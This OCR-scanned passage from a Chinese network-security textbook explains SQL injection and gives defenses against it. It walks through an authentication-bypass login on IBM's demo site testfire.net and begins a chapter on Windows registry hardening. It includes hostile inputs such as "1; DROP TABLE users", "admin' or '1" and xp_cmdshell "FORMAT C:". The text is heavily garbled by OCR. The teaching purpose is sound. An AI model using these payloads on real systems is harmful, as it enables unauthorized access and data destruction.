Foe 


9.1 用 户 需 求 与 分 析 


应 用 程序 在 向 后 台数 据 库 传 递 SQL 查询 时 ,如 果 没 有 对 提交 的 SQL 查询 适当 的 过 
滤 , 则 会 引发 SQL 注入 。 一 旦 在 线 服务 器 瘫痪 ,或 虽 表 面 在 正常 运行 ,但 后 台数 据 已 被 算 
改 或 窃取 ,都 将 造成 企业 或 个 人 的 巨大 损失 。 


9.2 预备 知识 


921 SQL 注入 概述 


结构 化 查询 语言 SQL 是 用 来 和 关系 数据 库 进行 交互 的 语言 。 它 允许 用 户 对 数据 进 
行 有 效 的 管理 ,包括 对 数据 的 查询 .操作 、 定 义 和 控 制 等 方面 ,如 向 数据 库 写 入 、 插 入 数据 、 
从 数据 库 读 取 数 据 等 。 

应 用 程序 在 向 后 台数 据 库 传递 SQL 查询 时 ,如 果 没 有 对 攻击 者 提交 的 SQL 查询 适 
当 的 过 滤 , 则 会 引发 SQL 注入 。 攻 击 者 通过 影响 传递 给 数据 库 的 内 容 来 修改 SQL 自身 
的 语法 和 功能 。SQL 注入 不 只 是 一 种 会 影响 Web 应 用 的 漏洞 : 对 于 任何 从 不 可 信 源 获 
取 输 入 的 代码 来 说 ,如 果 使 用 了 该 输入 来 构造 动态 的 SQL 语句 ,那么 就 很 可 能 受到 攻击 。 

SQL 注入 是 针对 Web 应 用 程序 的 主流 攻击 技术 之 一 ,2007 年 .2010 年 和 2013 年 在 
OWASP 组 织 公布 的 TOP 10 Web 应 用 程序 安全 风险 中 一 直 都 排 在 第 一 位 。SQL 注入 
通过 Web 应 用 程序 的 输入 验证 不 完善 漏洞 ,使 Web 应 用 程序 执行 由 攻击 者 所 注入 的 恶 
意 指令 和 代码 ,从 而 造成 数据 库 信 息 泄露 .攻击 者 对 系统 未 授权 访问 等 危害 极 高 的 后 果 。 

SQL 注入 是 由 于 Web 应 用 程序 对 用 户 输入 的 信息 没有 正确 过 滤 以 消除 SQL 语言 
中 的 字符 串 转 义 字符 ,如 单 引 号 ()、 双 引号 (")、 双 减 号 (--)、 双 下 划 线 (__)、 分 号 (;)\ 百 分 
号 (%)、 井 号 (#) 等 ,或 者 没有 对 输入 信息 进行 严格 的 类 型 判断 ,从 而 使 用 户 可 以 输入 并 
执行 一 些 非 预期 的 SQL 指令 。 
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922 SQ 注入 产生 的 原因 


SQL 注入 产生 的 原因 有 以 下 几 点 。 

(1) 在 应 用 程序 中 使 用 字符 串联 结 方式 组 合 SQL 指令 。 

(2) 在 应 用 程序 链接 数据 库 时 使 用 权限 过 大 的 账户 ,例如 很 多 开发 人 员 都 喜欢 用 sa 
这 个 内 置 的 最 高 权限 的 系统 管理 员 账 户 连接 Microsoft SQL Server 数据 库 。 

(3) 在 数据 库 中 开放 了 不 必要 但 权力 过 大 的 功能 ,例如 在 Microsoft SQL Server 数 
据 库 中 的 xp_cmdshell 延伸 预存 程序 或 是 OLE Automation 预存 程序 等 。 

(4) 太 过 于 信任 用 户 所 输入 的 数据 ,未 限制 输入 的 字符 数 , 以 及 未 对 用 户 输入 的 数据 
做 潜在 指令 的 检查 。 


923 SQL 注入 的 特点 


SQL 注入 的 特点 如 下 。 

(1) 隐蔽 性 强 : 利用 Web 漏洞 发 起 对 Web 应 用 的 攻击 纷繁 复杂 ,包括 SQL 注入 、 跨 
站 脚本 攻击 等 。 其 共同 特点 是 隐蔽 性 强 , 不 易 发 觉 ,因为 一 方面 普通 网 络 防火 墙 是 对 
HTTP/HTTPS 全 开放 的 ; 另 一 方面 对 Web 应 用 攻击 的 变化 非常 多 ,传统 的 基于 特征 检 
查 的 IDS 对 此 类 攻击 几乎 没有 作用 。 

(2) 攻击 时 间 短 : 可 在 短 短 几 秒 钟 到 几 分钟 内 完成 数据 窃取 \ 木 马 种 植 , 甚 至 完成 对 
整个 数据 库 或 Web 服务 器 的 控制 。 

(3) 危害 性 大 : 目前 几乎 所 有 银行 .证券 .电信 移动、 政府 以 及 电子 商务 企业 都 提供 
在 线 交 易 、 查 询 和 交互 服务 。 用 户 的 机 密 信息 包括 账户 、 身 份 证 号 、 家 庭 住 址 、 联 系 电话 以 
及 交易 信息 等 ,都 是 通过 Web 存储 在 后 台数 据 库 中 。 这 样 , 一 旦 在 线 服务 器 瘫痪 ,或 虽 表 
面 在 正常 运行 ,但 后 台数 据 已 被 自 改 或 窃取 ,都 将 造成 企业 或 个 人 的 巨大 损失 。 政 府 网 站 
被 攻击 和 算 改 造成 恶劣 的 社会 影响 , 若 被 外 来 势力 利用 则 可 能 危害 整个 社会 的 稳定 。 


924 SQL 注入 攻击 的 危害 


SQL 注入 攻击 的 危害 包括 以 下 几 个 方面 。 

(1) 数据 表 中 的 数据 外 泄 , 如 个 人 机 密 信息 .账户 数据 、 密 码 等 。 

(2) 数据 结构 被 黑客 探知 ,得 以 做 进一步 的 攻击 ,如 执行 SELECT * FROM sys. 
tables。 

(3) 数据 库 服务 器 被 攻击 ,系统 管理 员 账 户 被 自 改 ,如 执行 ALTER LOGIN sa 
WITH PASSWORD='XXXxxxx', 

(4) 取得 系统 较 高 权限 后 ,有 可 能 得 以 在 网 页 加 入 恶意 链接 以 及 XSS。 

(5) 经 由 数据 库 服务 器 提供 的 操作 系统 支持 ,让 黑客 得 以 修改 或 控制 操作 系统 ,如 执 
行 xp_cmdshell"net stop iisadmin" 可 停止 服务 器 的 IIS 服务 。 

(6) 破坏 硬盘 数据 ,瘫痪 整个 系统 ,例如 执行 xp_cmdshell "FORMAT C:"。 


925 SQL 注入 攻击 分 析 
例如 , 某 个 网 站 的 登录 验证 的 SQL 查询 代码 如 下 。 
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StrSQL = "SELECT * FROM users WHERE(name = '" +username+"')and(pw='"+password+"');" 
攻击 者 在 填写 用 户 名 密码 表单 时 恶意 填 入 如 下 信息 。 


"1" 
"1" 


username = "1'OR '1' 


password= "1'0R '1' 

这 时 ,将 导致 原本 的 SQL 字符 串 被 修改 。 因 为 代码 strSQL 王 "SELECT x* FROM 
users WHERECname 一 '1'OR 1 一 '1)and(pw 一 '1'OR 4 一 '10);" 在 WHERE 语句 后 面 的 条 
件 判断 结果 都 会 变 成 True ,也 就 是 实际 上 运行 的 SQL 命令 会 变 成 strSQL 王 "SELECT * 
FROM users;" ,因此 实现 无 账号 密码 ,也 可 登录 网 站 。 
926 SQ 注入 的 类 型 

SQL 注入 的 类 型 包括 以 下 几 种 。 








1. 不 正确 的 处 理 类 型 

如 果 一 个 用 户 提供 的 字段 并 非 一 个 强 类 型 .或 者 没有 实施 类 型 强制 ,就 会 发 生 这 种 情 
形 的 攻击 。 当 在 一 个 SQL 语句 中 使 用 一 个 数字 字段 时 ,没有 程序 员 检查 用 户 输入 的 合法 
性 ,例如 是 否 为 数字 型 ,就 会 发 生 这 种 攻击 。 例 如 : 

Statement: = "SELECT * FROM data WHERE id ="+a variable+";" 

从 这 个 语句 可 以 看 出 ,程序 员 希 望 a_variable 是 一 个 与 id 字段 有 关 的 数字 。 不 过 ,如 
果 终 端 用 户 选择 一 个 字符 串 ,就 绕 过 了 对 转 义 字符 的 需要 。 例 如 将 a_variable 设置 为 “1; 
DROP TABLE users”, 它 就 会 将 users 表 从 数据 库 中 删除 ,SQL 语句 变 成 


SELECT * FROM data WHERE id = 1;DROP TABLE users; 


2. 数据 库 服务 器 中 的 漏洞 


有 时 ,数据 库 服务 器 软件 中 也 存在 着 漏洞 ,如 MYSQL 服务 器 中 mysql_real_escape_ 
string() 函数 漏洞 。 这 种 漏洞 允许 一 个 攻击 者 根据 错误 的 统一 字符 编码 执行 一 次 成 功 的 
SQL 注入 式 攻击 ,在 数据 库 字 符 集 设 为 GBK 时 可 能 被 绕 过 的 。 


3. 盲目 SQL 注入 式 攻击 


当 一 个 Web 应 用 程序 易于 遭受 攻击 而 其 结果 对 攻击 者 却 不 可 见 时 ,就 会 发 生 所 谓 的 
盲目 SQL 注入 式 攻击 。 有 漏洞 的 网 页 可 能 并 不 会 显示 数据 ,而 是 根据 注入 合法 语句 中 的 
逻辑 表达 式 的 结果 显示 不 同 的 内 容 。 这 种 攻击 相当 耗 时 ,因为 必须 为 每 一 个 获得 的 字 节 
而 精心 构造 一 个 新 的 语句 。 但 是 一 旦 漏洞 的 位 置 和 目标 信息 的 位 置 被 确定 之 后 ,一 种 称 
为 Absinthe 的 工具 就 可 以 使 这 种 攻击 自动 化 。 


4. 条 件 响 应 
有 一 种 SQL 注入 迫使 数据 库 在 一 个 普通 的 语句 中 计算 一 个 逻辑 表达 式 的 值 ,例如 : 








| Coy (第 版 ] 


SELECT booktitle FROM booklist WHERE bookID = '00k14cd'AND 1=1 


这 不 会 产生 什么 问题 。 但 是 语句 SELECT booktitle FROM booklist WHERE 
bookID 二 'OOk14cd'AND 1 一 2 会 给 出 一 个 不 同 的 结果 。 此 类 注入 证 明 盲 目的 SQL 注入 
是 可 能 的 , 它 会 使 攻击 者 根据 另外 一 个 表 中 某 字段 的 内 容 设计 可 以 判断 真 伪 的 语句 。 


5. 条 件 性 差错 


如 果 WHERE 语句 为 真 ,这 种 类 型 盲目 SQL 注入 会 迫使 数据 库 判 断 一 个 引起 错误 的 语 
名 ,从 而 导致 一 个 SQL 错误 。 例 如 : SELECT 1/0 FROM users WHERE username 一 
"Ralph'。 显 然 ,如 果 用 户 Ralph 存在 的 话 ,被 零 除 将 导致 错误 。 


6. 时 间 延 误 


时 间 延 误 是 一 种 盲目 的 SQL 注入 ,根据 所 注入 的 逻辑 , 它 可 以 导致 SQL 引擎 执行 一 
个 长 队列 或 者 是 一 个 时 间 延 误 语句 。 攻 击 者 可 以 衡量 页 面 加 载 的 时 间 , 从 而 决定 所 注入 
的 语句 是 否 为 真 。 


927 SQL 注入 防范 


有 以 下 几 种 方法 可 以 防范 SQL 注入 。 

(1) 在 设计 应 用 程序 时 ,完全 使 用 参数 化 查询 (Parameterized Query) 来 设计 数据 访 
问 功 能 。 

(2) 在 组 合 SQL 字符 串 时 ,针对 所 传人 的 参数 作 字 符 取 代 , 将 单 引 号 字符 取代 为 连 
续 两 个 单 引号 字符 。 

(3) 如 果 使 用 PHP 开发 网 页 程序 的 话 , 可 以 打开 PHP 的 魔术 引号 (Magic quote) 功 
能 ,自动 将 所 有 的 网 页 传人 参数 ,将 单 引 号 字符 取代 为 连续 两 个 单 引 号 字符 。 

(4) 使 用 其 他 更 安全 的 方式 连接 数据 库 , 如 使 用 已 修正 过 SQL 注入 问题 的 数据 库 连 
接 组 件 如 ASP. NET 的 sqlDataSource 对 象 或 LINQ to SQL 。 

(5) 使 用 防 SQL 注入 系统 。 


9.3 方案 设计 


方案 设计 如 表 9-1 所 示 。 











表 9-1 方案 设计 
任务 名 称 SQL 注入 攻击 
1. 测试 网 站 是 否 存在 Web 漏洞 
任务 分 解 | ”2. 构造 查询 结果 永远 为 真 的 条 件 表达 式 
3. 验证 构造 结果 ,完成 SQL 注入 攻击 
二 1. 熟悉 SQL 注入 步骤 和 过 程 
能 力 目标 | 。 掌握 SQL 注入 常用 工具 的 使 用 








项 目 9 SQL 注入 攻击 





续 表 





. 了 解 SQL 注入 原理 

. 了 解 SQL 注入 产生 的 原因 
了 解 SQL 注入 的 特点 
熟悉 SQL 注入 的 危害 
了 解 SQL 注入 的 类 型 
熟悉 SQL 注入 的 防范 


培养 良好 的 职业 道德 

. 树立 较 强 的 安全 意识 

. 掌握 网 络 安全 行业 的 基本 情况 

. 树立 较 强 的 安全 ,节约 、 环 保 意 识 


知识 目标 





素质 目标 





NP 





9.4 项 目 实 施 
任务 : SQL 注入 实战 


1. 任务 目标 


(1) 了 解 SQL 注入 原理 。 
(2) 熟悉 SQL 注入 步骤 和 过 程 。 
(3) 掌握 SQL 注入 常用 工具 的 使 用 。 


2. 工作 任务 


本 任务 以 testfire. net 网 站 为 例 测 试 其 用 户 登 录 页 面 。testfire. net 是 IBM 公司 为 演 
示 其 著名 的 Web 应 用 安全 扫描 产品 AppScan 的 强大 功能 所 建立 的 一 个 测试 网 站 ,是 一 
个 包含 很 多 典型 Web 漏洞 的 模拟 银行 网 站 。 


3. 工作 环境 
一 台 能 上 网 的 主机 。 
4. 实施 过 程 


(1) 测试 网 站 是 否 存 在 Web 漏洞 ,具体 操作 步骤 如 下 。 

OO 打开 网 站 登录 页 面 http://testfire. net/bank/login. aspx, 如 图 9-1 所 示 。 

@ 在 username 和 password 表单 分 别 输入 “admin'” 进 行 测试 ,如 图 9-2 所 示 。 

@ 单 击 Login 按钮 ,提交 表单 后 ,出 现 如 图 9-3 所 示 的 错误 页 面 。 

(2) 构造 查询 结果 永远 为 真 的 条 件 表达 式 , 具 体操 作 步 又 如 下 。 

@ 出现 错误 的 根本 原因 是 因为 网 站 没有 对 用 户 的 输入 进行 最 基本 的 过 滤 处 理 ,而 且 可 
以 根据 反馈 的 出 错 信息 ,分 析 得 出 网 站 进行 用 户 验证 时 使 用 的 SQL 语句 为 “SELECT x 
FROM [users] WHERE username 一 ? AND password 一 ?”。 这 种 SQL 验证 语句 是 没有 
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@ | 碟 htpytestfire netbankloginaspx 内 - 上 | 愿 Akoro Mutuat:onlin.. x 关 | 从 地 


文件 (F) 编辑 (E) 查看 (V) 收藏 夫 (A) 工具 (T) 帮助 (H; 











Sign Im | Contact Us | Feedback | Search AN 


AltoroMutual > SE 



































Username: 























， Investments& 
人 password: 
. Services 
v 
图 9-1 登录 页 面 
= 
€) )|@ nrpytestfreneVbanwlognaspx Dv | 臣 AtoroMuuatonin. x 国 介 六 多 @ 


文件 (F) 编辑 (E) 查看 (V) 收藏 夫 (A) 工具 (T) 玫 助 (H) 


AltoroMutual > 





Sign In | Contact Us | Feedback | Search AN| 












































v 
图 9-2 输入 测试 
经 过 任何 处 理 的 ,极度 危险 的 ,因此 可 以 通过 构造 特殊 的 表单 值 使 得 该 查询 的 条 件 表 达 式 


结果 永远 为 真 。 
@ 构造 的 语句 如 下 。 


SELECT * FROM [users] WHERE username = 'admin' OR '1'AND password = 'admin'OR 1 


这 语句 会 使 SQL 查询 语句 的 条 件 永远 为 真 ,因为 在 SQL 中 逻辑 运算 符 的 优先 级 OR 








@ 七 http://testfire.net/bank/login.aspx 只 - C500-Intemalsever.. x 
文件 (F) 编辑 (日 ， 查 看 (V) 收 意 夫 (A) 工具 (D 帮助 (H) 


| 


500 - Internal server error. 





There is a problem with the resource you are looking for and it cannot be displayed. 


AltoroMutual > 


An Error Has Occurred 
Summary: 





Syntax error (missing operator) in query expression 'username = ‘admin" AND password = 'admin'" 
Error Message: 
System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression ‘username = ‘admin" AND password = 


‘admin". at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandiing(OleDbHResult hr) at 


System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbparams, Objecta. executeResult) at v 
System.Data.OleDb.OleDbCommand.ExecuteCommandText(Objecta. executeResult) at 











图 9-3 错误 页 面 
低 于 AND, 所 以 OR 1 后 表达 式 的 结果 是 永远 为 真 , 条 件 表达 式 的 结果 也 总 是 为 真 。 
(3) 验证 构造 结果 ,完成 SQL 注入 攻击 ,具体 操作 步骤 如 下 。 
返回 登录 页 面 ,在 Username 框 中 输入 “admin 'or'1”, 在 Password 框 中 输入 “admin 
or'1”, 单 击 Login 按钮 ,在 弹出 的 页 面 中 显示 已 经 成 功 登 录 进入 了 网 站 的 后 台 , 如 图 9-4 





3 0 x 
@ 感 httpi//testfire.net/bank/main.aspx P70 Atoro Mutuat: Onlin.. x ®@ 
文件 (F) 编辑 (日 查看 (V) 收 若 夫 (A) 工具 (T) 帮助 (H) 


AltoroMutual > 





Sign Off | Contact Us | Feedback | Search | 内 









Hello Admin User 


‘Welcome to Altoro Mutual Online. 


View Ar it Details: 
few Account Detail Vv|]| Go 














图 9-4 后 台 页 面 
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实现 SQL 注入 的 基本 步骤 是 什么 ? 

答 : 首先 ,判断 环境 ,寻找 注入 点 ,判断 网 站 后 台数 据 库 类 型 ; 其 次 ,根据 注入 参数 类 
型 ,在 脑海 中 重 构 SQL 语句 的 原貌 ,从 而 猜测 数据 库 中 的 表 名 和 列 名 ; 最 后 ,在 表 名 和 列 
名 猜测 成 功 后 ,再 使 用 SQL 语句 得 出 字段 的 值 。 


9.6 认证 试题 

选择 题 
和 ) 能 防止 针对 服务 器 的 缓冲 区 溢出 攻击 。 

A. 及 时 打 补 丁 B. 开启 自动 更 新 

C. 部 署 防火 墙 D. 增加 密码 强度 
2. 向 有 限 的 空间 输入 超 长 的 字符 串 属于 ( ) 攻 击 手 段 。 

A. 缓冲 区 溢出 B. 网 络 监听 C. 拒绝 服务 D. IP 欺骗 
3. 下 列 ( ) 不 是 针对 Web 攻击 的 。 

A. 木马 B. 跨 站 攻击 C. SQL 注 入 D. 网 络 钓鱼 
4. 部 署 ( ) 安 全 设备 可 以 大 大 提高 服务 器 的 安全 性 。 

A. IPS B. IDS C. 防火 墙 D. 扫描 设备 
5. 下 列 ( ) 不 能 防止 SQL 注入 攻击 。 

A. 提高 程序 代码 的 质量 B. 部 署 Web 应 用 防火 墙 

C. 安装 杀毒 软件 D. 定期 备份 


6. 下 列 关于 跨 站 攻击 描述 错误 的 是 ( ) 。 
A. 攻击 者 要 熟悉 脚本 语言 . 跨 站 攻击 是 一 种 被 动 攻击 
C. 论坛 是 跨 站 攻击 的 常见 传播 途径 D. 跨 站 攻击 会 修改 Web 程序 
7. 下 列 关 于 SQL 注入 攻击 描述 错误 的 是 ( hs 
A. 程序 员 提 高 编程 的 技巧 能 防止 SQL 注入 攻击 
B. SQL 注入 攻击 主要 是 窃取 数据 库 中 的 数据 
C. SQL 注入 漏洞 主要 是 程序 员 的 SQL 语句 书写 不 规范 
D. 只 要 引起 注意 ,SQL 注入 攻击 是 比较 容易 解决 的 
8. 许多 黑客 利用 软件 实现 中 的 缓冲 区 溢出 漏洞 进行 攻击 ,对 于 这 一 威胁 ,最 可 靠 的 
解决 方案 是 ( Ys 
A. 安装 防火 墙 B. 安装 用 户 认 证 系统 
C. 安装 相关 的 系统 补丁 软件 D. 安装 防 病 毒 软件 
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学 习 情 境 二 





主要 防护 技术 分 析 


本 学 习 情 境 主要 介绍 主要 防护 技术 , 即 操作 系统 日 常 维护 中 最 重要 的 内 容 , 包 括 注 册 
表 的 管理 与 维护 、 组 策略 的 设置 .数据 加 密 技 术 的 使 用 、Internet 信息 服务 的 安全 管理 和 
Linux 系统 加 固 。 本 学 习 情境 以 5 个 项 目 为 案例 ,不 仅 介 绍 系统 内 置 的 管理 工具 外 ,还 介 
绍 实际 工作 中 常用 的 加 密 工具 PGP 的 使 用 方法 ,以 进一步 加 强 操作 系统 的 安全 管理 。 

通过 本 学 习 情 境 所 有 项 目的 实践 .可 以 学 会 如 何 对 企业 网 操作 系统 进行 安全 部 署 , 解 
决 系统 平台 配置 中 遇 到 的 网 络 安全 问题 和 学 习 组 策略 管理 .注册 表 管 理 IIS 安全 设置 以 
及 Linux 系统 加 固 所 需要 的 相关 网 络 安全 知识 ,能 排除 网 络 中 可 能 出 现 的 问题 ,为 将 来 工 
作 累 计 实 践 经 验 。 

本 学 习 情 境 需要 完成 的 项 目 有 : 

项 目 10 注册 表 的 管理 

项 目 11 组 策略 的 设置 

项 目 12 数据 加 密 技术 的 使 用 

项 目 13 Internet 信息 服务 的 安全 设置 

项 目 14 Linux 系统 加 固 


Po 


10.1 用 户 需 求 与 分 析 


Windows 的 注册 表 是 一 个 庞大 的 数据 库 , 它 包含 了 Windows 运行 期 间 不 断 引 用 的 
信息 ,存储 着 软 、 硬 件 的 有 关 配 置 和 状态 信息 ,应 用 程序 和 资源 管理 器 外 壳 的 初始 条 件 、 首 
选项 和 印 载 数据 ; 计算 机 整个 系统 的 设置 和 各 种 许可 ,文件 扩展 名 与 应 用 程序 的 关联 , 硬 
件 的 描述 ,状态 和 属性 ; 计算 机 性 能 记录 和 底层 的 系统 状态 信息 ,以 及 各 类 其 他 的 数 
据 , 所 以 注册 表 的 管理 在 网 络 管理 员 的 系统 维护 中 至 关 重 要 。 


10.2 预备 知识 


21 注册 表 的 组 成 


从 一 般 用 户 的 角度 看 ,注册 表 系 统 由 注册 表 数 据 库 和 注册 表 编辑 器 两 部 分 组 成 。 注 
册 表 编辑 器 是 专门 编辑 注册 表 的 程序 ,负责 注册 表 的 浏览 、 编 辑 和 修改 。 注 册 表 编辑 器 与 
资源 管理 器 相似 ,也 是 树 状 目录 结构 。 但 资源 管理 器 中 的 目录 是 文件 夹 , 而 注册 表 中 的 目 
录 是 键 (key) ,在 注册 表 编 辑 器 中 ,最 上 面 的 键 叫 根 键 ,里 面包 含 的 叫 子 键 。 单 击 根 键 前 面 
的 加 号 ,就 能 展开 属于 这 个 根 键 的 子 键 。 

注册 表 编 辑 器 的 左 侧 窗口 显示 的 是 目录 结构 , 右 侧 窗口 显示 的 是 与 左 侧 窗口 中 所 选 
键 的 相关 的 设 定 值 、 命 令 等 。 所 有 的 注册 表 键 都 有 “默认 ”项 ,每 个 值 分 为 名称“ 类 型 "和 
“数据 ”3 部 分 ,这 种 直观 的 结构 体系 也 被 称 为 注册 表 的 逻辑 结构 。 

Windows 注册 表 由 5 个 根 键 组 成 ,下 面 介绍 每 种 根 键 的 内 容 和 含义 ,如 表 10-1 
所 示 。 
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表 10-1 注册 表 的 5 个 根 键 











名 称 含义 内 容 
HKEY_CLASSES_ROOT 种 类 _ 根 键 存储 系统 中 所 有 的 文件 类 型 标识 和 基本 操作 标识 
HKEY_CURRENT_USER 当前 _ 用 户 键 | 存储 当前 用 户 配置 文件 和 设置 信息 





存储 计算 机 安装 的 硬件 和 软件 的 所 有 设置 内 容 ， 


HKEY_LOCAL_MACHINE 定位 _ 机 器 键 以 及 硬件 和 硬件 驱动 程序 的 设置 信息 





存储 所 有 用 户 信息 ,包括 动态 加 载 的 用 户 配置 文 


HKEY_USERS 用 户 键 件 和 默认 的 配置 文件 











HKEY_CURRENT_CONFIG 当前 _ 配 置 键 | 存储 本 地 计算 机 系统 使 用 的 硬件 配置 信息 





1 2 2 注册 表 值 的 数据 类 型 


注册 表 值 采 用 了 多 种 数据 形式 来 存储 设置 ,在 注册 表 编辑 器 的 右 侧 窗 格 中 ,“ 类 型 " 列 
显示 的 项 目 就 是 所 属 值 的 数据 类 型 。 经常 使 用 的 值 的 数据 类 型 有 字符 串 值 二 进 制 值 、 
DWORD 值 ,多 字符 串 值 和 可 扩充 字符 串 值 ,如 表 10-2 所 示 。 

表 10-2 注册 表 值 的 数据 类 型 

数据 类 型 功 能 





DWORD 表示 双 字 (Double Word) ,表示 为 REG_DWORD。 字 能 表示 0 一 65535 
DWORD 值 范围 内 的 16 位 数 ,因此 DWORD 是 由 两 个 16 位 值 组 成 的 32 位 数值 。DWORD 
能 表示 2”, 也 就 是 40 亿 以 上 的 数据 ,但 大 部 分 情况 下 用 来 表示 真 (1) 和 假 (0) 





多 种 UNICODE 的 字符 串 集 合 ,表示 为 REG_MULTI_SZ, 能 把 多 种 内 容 显示 为 











多 字符 串 值 数据 
字符 串 值 存储 字符 串 类 型 的 数据 ,表示 为 REG_SZ, 这 里 的 S 是 指 字符 串 (String),Z 表示 
以 0 组 成 的 字 节 结 束 
二 进 制 值 用 0 和 1 表示 的 二 进 制 数据 类 型 ,表示 为 REG_BINARY 
indows 个 系统 定义 ,这 些 有 凡生 习 
可 扩充 字符 品 值 Windows 中 使 用 多 个 系统 定义 变量 ,这 些 变量 可 以 在 BAT 文件 或 控制 面板 的 





系统 环境 变量 中 设 定 ,在 注册 表 编 辑 器 中 表示 为 REG_EXPAND_SZ 





10 2 3 注册 表 的 打开 方式 


组 策略 使 用 命令 行 方 式 打开 。 在 Windows 中 , 按 Win 十 R 组 合 键 ,弹出 “运行 "对 话 
框 ,输入 regedit 命令 并 按 Enter 键 ,打开 注册 表 窗 口 。 


10.3 方案 设计 


方案 设计 如 表 10-3 所 示 。 


表 10-3 方案 设计 


项 目 10 注册 表 的 管理 > | 








任务 名 称 


注册 表 的 管理 





任务 分 解 


1. 永久 关闭 默认 共享 

(1) 关闭 分 区 默认 共享 (如 C$ .DS$ .ES$……) 
(2) 关闭 管理 默认 共享 (ADMIN $ ) 

(3) 关闭 IPC$ 默认 共享 ,防范 IPC$ 攻 击 
2. 设置 Windows 的 自动 登录 

3. 清除 系统 中 随机 启动 的 木马 

4. 清除 恶意 代码 

(1) 删除 开机 自动 弹出 的 网 页 

(2) 删除 开机 自动 弹出 的 恶作剧 对 话 框 
(3) 修改 IE 的 首页 

(4) 修改 IE 的 默认 页 

(5) 修改 下 的 右键 菜单 

(6) 删除 IE 工具 栏 中 被 添加 的 网 站 超 链接 
5. 防止 SYN 洪水 攻击 

6. 注册 表 的 防 黑 设置 

(1) 禁止 远程 修改 注册 表 

(2) 禁止 普通 用 户 查 看 事件 记录 

(3) 找 出 隐藏 的 超级 用 户 

7. 注册 表 的 备份 和 恢复 

(1) 备份 注册 表 

(2) 恢复 注册 表 





能 力 目标 


1. 能 通过 修改 注册 表 防 范 IPC$ 攻击 

.能 通过 修改 注册 表 永久 关闭 默认 共享 

.能 通过 修改 注册 表 自 动 登录 计算 机 

.能 手动 清除 隐藏 在 系统 中 随机 启动 的 木马 


.能 通过 修改 注册 表 删 除开 机 自动 弹出 的 恶作剧 对 话 框 


.能 手动 修改 被 自 改 的 下 首页 

.能 手动 修改 IE 的 右键 菜单 项 

9. 能 手动 删除 IE 工具 栏 被 添加 的 网 站 超 链接 
10. 能 通过 修改 注册 表 防 范 SYN 洪水 攻击 
11. 能 手动 备份 和 恢复 注册 表 


2 
3， 
4 
5. 能 通过 修改 注册 表 删 除开 机 自动 弹出 的 网 页 
6， 
和 
8 





知识 目标 


1. 了 解 注册 表 的 组 成 
2. 熟悉 注册 表 值 的 数据 类 型 
3. 掌握 注册 表 的 打开 方式 





素质 目标 





1. 培养 良好 的 职业 道德 

2. 树立 较 强 的 安全 意识 

3. 培养 职业 兴趣 ,能 爱 岗 敬业 、 热 情 主动 的 工作 态度 
4. 具有 可 持续 发 展 能 力 

5. 树立 较 强 的 安全 节约、 环保 意识 
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10.4 项 目 实施 


人 41 任务 1: 永久 关闭 默认 共享 
1. 任务 目标 


以 默认 方式 安装 Windows 系统 后 ,所 有 的 硬盘 都 是 隐藏 共享 的 。 一 般 默 认 共享 的 目 
录 只 有 系统 管理 员 能 够 在 网 络 中 查看 ,因为 在 共享 名 称 旁 加 了 “$ "符号, 这样 除 非 别人 知 
道 这 个 共享 ,否则 将 无 法 找到 该 共享 文件 。 虽 然 对 其 访问 还 需要 超级 用 户 的 密码 ,但 这 是 
洪 在 的 安全 隐患 ,因此 从 服务 器 的 安全 考虑 ,最 好 关闭 默认 共享 ,以 保证 系统 的 安全 。 虽 
然 使 用 net share 命令 可 以 关闭 系统 的 默认 共享 ,但 这 只 是 暂时 的 ,在 系统 重启 后 会 再 次 
打开 。 如 果 需 要 永久 关闭 默认 共享 可 以 通过 修改 注册 表 来 完成 。 


2. 工作 任务 


(1) 关闭 分 区 默认 共享 (如 C$ 、D$ 、E$…… )。 
(2) 关闭 管理 默认 共享 (ADMIN $ ) 。 
(3) 关闭 IPC$ 默认 共享 ,防范 IPC$ 攻击 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


(1) 关闭 分 区 默认 共享 (如 C$ .DS$ 、E$…… )。 对 于 C$ .D$ 和 ES$ 等 类 型 的 默认 
共享 的 关闭 可 以 按照 以 下 操作 步骤 进行 。 

OO 打开 注册 表 编 辑 器 ,展开 HKEY _ LOCAL _ MACHINE \ SYSTEMA\\ 
CurrentControlSet\Services\Lamanserver\Parameters 子 键 。 

@ 在 该 子 键 右边 窗 格 中 找到 并 双击 AutoShareServer 键 值 项 ,如 图 10-1 所 示 。 将 
“数值 数据 "文本 框 里 的 数值 修改 为 0, 单 击 “ 确 定 ” 按 钮 保存 。 

如 果 找 不 到 AutoShareServer 键 值 项 , 则 在 右 侧 窗 格 中 右 击 , 在 弹出 的 快捷 菜单 中 选 
择 “ 新 建 ”>“DWORD(32- 位 ) 值 ”命令 ,然后 将 新 建 项 重新 命名 为 AutoShareServer, 设 置 
其 类 型 为 REG_DWORD, 值 为 0。 

(2) 关闭 管理 默认 共享 (ADMIN $ )。 对 于 ADMIN $ 的 默认 共享 的 关闭 可 以 按照 以 
下 操作 步骤 进行 。 

@ 打 开 注 册 表 编辑 器 , 展开 HKEY _ LOCAL _ MACHINE \ SYSTEM\ 
CurrentControlSet\Services\Lamanserver\Parameters 子 键 。 

@ 在 该 子 键 右边 窗 格 中 找到 并 双击 AutoShareWks 键 值 项 .如 图 10-2 所 示 。 将 “ 数 
值 数据 "文本 框 里 的 数值 修改 为 0, 单 击 “ 确 定 ”按钮 保存 。 














ET =I9Ix| 
文件 F) 编辑 FE) 查看 W) 收藏 夫 W) 帮助 00 
KtnEn 加 类 型 
日 -而 Lamanserver a8] BA) (做 值 示 设置) 
晶 Nisses | 到 Mjustedial Dx00000003 (3) 
直 itotunedpa |‖ 人 sutodisconnect Ox0000000£ (15) 


周 DefaultSecu AutoShareServer Ox00000000 (0) 





坟 Linksee 名 hutoShareNks Ox00000000 (0D) 


BB Deroneters S|| 区 znablekothen. ox00000000 (0) 国 
1 | »| »| 
夺 算 机 WUEY_LOCAL MACHINE\SYSTEN\CurrentControlSet\services\LamanServer \Paraneters 2 


图 10-1 修改 AutoShareServer 键 值 项 
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BMiases 人 Adjustedlill. .. REG_IWORD 。 0x00000003 (3) 


OM AutotunedPar 
DefaultSecwm 
骨 Linkage 


水 ee 


肝 算 机 WEY_IOCAL NACHINE\SYSTEN\CurrentControlSet\services\LanmanServer\Paraneters 


